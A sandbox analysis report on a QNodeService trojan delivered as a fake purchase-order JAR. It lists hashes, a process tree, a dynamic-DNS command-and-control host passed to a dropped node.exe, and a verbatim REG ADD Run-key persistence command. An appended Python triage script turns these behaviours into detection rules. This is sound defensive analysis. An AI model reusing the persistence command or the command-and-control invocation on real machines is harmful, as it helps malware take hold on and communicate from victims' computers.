Analysis
max time kernel: 37s
max time network: 130s
platform: windows10_x64
resource: win10
submitted: 19-10-2020 10:11

Static task: static1

Behavioral task: behavioral1
  Sample: Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
  Resource: win7v200722

Behavioral task: behavioral2
  Sample: Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
  Resource: win10
General
Target: Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar
Size: 76KB
MD5: b87b80852063d48f3373fcee56a9a9c1
SHA1: 25fd2c6d43ec8335f7f793e339d07c3517e7737d
SHA256: cd71c5e1f36a2fa25cd515061e8e9eb52d993af7179b7068e7ec1faeab137858
SHA512: d23416931e8968b0e16ce96036113fb9ff3483d0e3344d0fc4570feff1aa3101676c469da31ca28afccbea22f3328cc5a7f2f6bdecb3edfe4bd0fce9cdf70562
Malware Config
Signatures

QNodeService
Trojan/stealer written in Node.js and spread via a Java downloader. In this run the JAR is the downloader stage: it launches a second JAR from a temp file, which in turn starts a dropped node.exe runtime from the user profile.
Executes dropped EXE (3 IoCs)
pid | Process
3800 | node.exe
1304 | node.exe
2120 | node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\e34ca5b1-6f1a-4260-8eac-bb9ada17b339 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
JavaScript code in executable (3 IoCs)
resource | yara_rule
behavioral2/files/0x000100000001ad91-173.dat | js
behavioral2/files/0x000100000001ad91-178.dat | js
behavioral2/files/0x000100000001ad91-182.dat | js
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
25 | wtfismyip.com
26 | wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that ~MHz and ProcessorNameString under CentralProcessor\<n> are exactly the values libuv reads to implement Node's os.cpus(), so on a node.exe process this signature can fire from an ordinary runtime call rather than a dedicated sandbox check; treat it as weak evidence on its own.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid | Process | occurrences
3800 | node.exe | 4
1304 | node.exe | 4
2120 | node.exe | 10
Suspicious use of WriteProcessMemory (12 IoCs; each pair is recorded twice in the report)
description | pid | Process | procid_target
PID 2984 wrote to memory of 2644 | 2984 | java.exe | 76
PID 2644 wrote to memory of 3800 | 2644 | javaw.exe | 78
PID 3800 wrote to memory of 1304 | 3800 | node.exe | 80
PID 1304 wrote to memory of 2120 | 1304 | node.exe | 81
PID 2120 wrote to memory of 3788 | 2120 | node.exe | 83
PID 3788 wrote to memory of 2196 | 3788 | cmd.exe | 84
Processes

1. C:\ProgramData\Oracle\Java\javapath\java.exe (PID 2984)
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar"
   - Suspicious use of WriteProcessMemory
  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe (PID 2644)
     Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e6ad94e0.tmp
     - Suspicious use of WriteProcessMemory
    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 3800)
       Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums330.hopto.org
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 1304)
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_euGUNF\boot.js --hub-domain ntums330.hopto.org
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 2120)
           Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_euGUNF\boot.js --hub-domain ntums330.hopto.org
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
          6. C:\Windows\system32\cmd.exe (PID 3788)
             Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e34ca5b1-6f1a-4260-8eac-bb9ada17b339" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             - Suspicious use of WriteProcessMemory
            7. C:\Windows\system32\reg.exe (PID 2196)
               Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e34ca5b1-6f1a-4260-8eac-bb9ada17b339" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               - Adds Run key to start application
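The behaviours recorded above (a Java launcher handing off to a node.exe dropped under the user profile, a --hub-domain argument naming a dynamic-DNS host, a Run key whose data runs a .vbs through cmd /C, and a lookup against an IP-echo service) can be turned into triage rules that run over sandbox or EDR events. The Python below is an added example, not part of this report or of any QNodeService tooling. Its EVENTS list is constructed from the report's process tree, registry and network sections; the event field names, the IP-lookup hosts other than wtfismyip.com and the dynamic-DNS suffixes other than hopto.org are this script's own assumptions.

```python
"""Triage rules for the QNodeService chain in this report.

Added example, not part of the sandbox report or of any QNodeService tooling.
EVENTS is constructed from the report; the field names (kind, pid, image,
cmdline, parent_image, key, value, data, host) are an assumption of this
script, not a sandbox export format.
"""
import ntpath
import re

JAVA_LAUNCHERS = {"java.exe", "javaw.exe"}  # the downloader stage in the report
# IP-echo services: wtfismyip.com is the one in the report; the others are
# common equivalents added here as an assumption.
IP_LOOKUP_HOSTS = {"wtfismyip.com", "api.ipify.org", "icanhazip.com", "ifconfig.me"}
# Free dynamic-DNS suffixes; hopto.org carries the report's --hub-domain value.
DYNDNS_SUFFIXES = (".hopto.org", ".ddns.net", ".no-ip.org")

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run$", re.IGNORECASE)
# Matches 'cmd /D /C "<path>.vbs"' with any number of switches before /C.
SCRIPT_RUN_RE = re.compile(
    r'cmd(?:\.exe)?\s+(?:/\w+\s+)*/c\s+"?([^"]+\.(?:vbs|js|wsf|bat|cmd))', re.IGNORECASE)
HUB_DOMAIN_RE = re.compile(r"--hub-domain\s+(\S+)", re.IGNORECASE)


def in_user_profile(path):
    """True for anything under C:\\Users, i.e. writable without admin rights."""
    return path.lower().startswith("c:\\users\\")


def check_process(ev):
    findings = []
    parent = ntpath.basename(ev.get("parent_image") or "").lower()
    image = ev["image"]
    # Java launcher -> node.exe living in the user profile: the dropper hand-off.
    if (parent in JAVA_LAUNCHERS and ntpath.basename(image).lower() == "node.exe"
            and in_user_profile(image)):
        findings.append({"rule": "java_spawns_user_node", "pid": ev["pid"], "detail": image})
    # --hub-domain pointing at a free dynamic-DNS host.
    m = HUB_DOMAIN_RE.search(ev["cmdline"])
    if m and m.group(1).lower().endswith(DYNDNS_SUFFIXES):
        findings.append({"rule": "dyndns_hub_domain", "pid": ev["pid"], "detail": m.group(1)})
    return findings


def check_registry(ev):
    # Run key whose data launches a script from the user profile via cmd /C.
    if not RUN_KEY_RE.search(ev["key"]):
        return []
    m = SCRIPT_RUN_RE.search(ev["data"])
    if m and in_user_profile(m.group(1)):
        return [{"rule": "run_key_script_persistence", "pid": ev["pid"],
                 "detail": f'{ev["value"]} -> {m.group(1)}'}]
    return []


def check_network(ev):
    if ev["host"].lower() in IP_LOOKUP_HOSTS:
        return [{"rule": "external_ip_lookup", "pid": ev["pid"], "detail": ev["host"]}]
    return []


CHECKS = {"process": check_process, "registry": check_registry, "network": check_network}


def triage(events):
    """Run every rule over a list of event dicts and return all findings."""
    findings = []
    for ev in events:
        findings.extend(CHECKS[ev["kind"]](ev))
    return findings


# Constructed from the report's process tree, registry and network sections.
EVENTS = [
    {"kind": "process", "pid": 2984, "parent_image": None,  # parent not listed in the report
     "image": r"C:\ProgramData\Oracle\Java\javapath\java.exe",
     "cmdline": r'java -jar "C:\Users\Admin\AppData\Local\Temp\Our New Order Oct 19 2020 at 2.90_PVV440_PDF.jar"'},
    {"kind": "process", "pid": 2644, "parent_image": r"C:\ProgramData\Oracle\Java\javapath\java.exe",
     "image": r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
     "cmdline": r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e6ad94e0.tmp'},
    {"kind": "process", "pid": 3800, "parent_image": r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
     "image": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "cmdline": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums330.hopto.org"},
    {"kind": "process", "pid": 1304, "parent_image": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "image": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "cmdline": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_euGUNF\boot.js --hub-domain ntums330.hopto.org"},
    {"kind": "registry", "pid": 2196, "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "e34ca5b1-6f1a-4260-8eac-bb9ada17b339",
     "data": r'cmd /D /C "C:\Users\Admin\qhub\node\2.0.10\boot.vbs"'},
    {"kind": "network", "pid": None, "host": "wtfismyip.com"},  # report lists the flow without a pid
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f'{f["rule"]:<28} pid={f["pid"]}  {f["detail"]}')
```

The java-to-node rule is the strongest of the four: java.exe or javaw.exe starting a Node runtime from under C:\Users is rare in legitimate software, whereas an IP lookup or a Run key on its own is noisy. Scoring or correlating the findings per process tree, rather than alerting on each rule separately, is the usual next step.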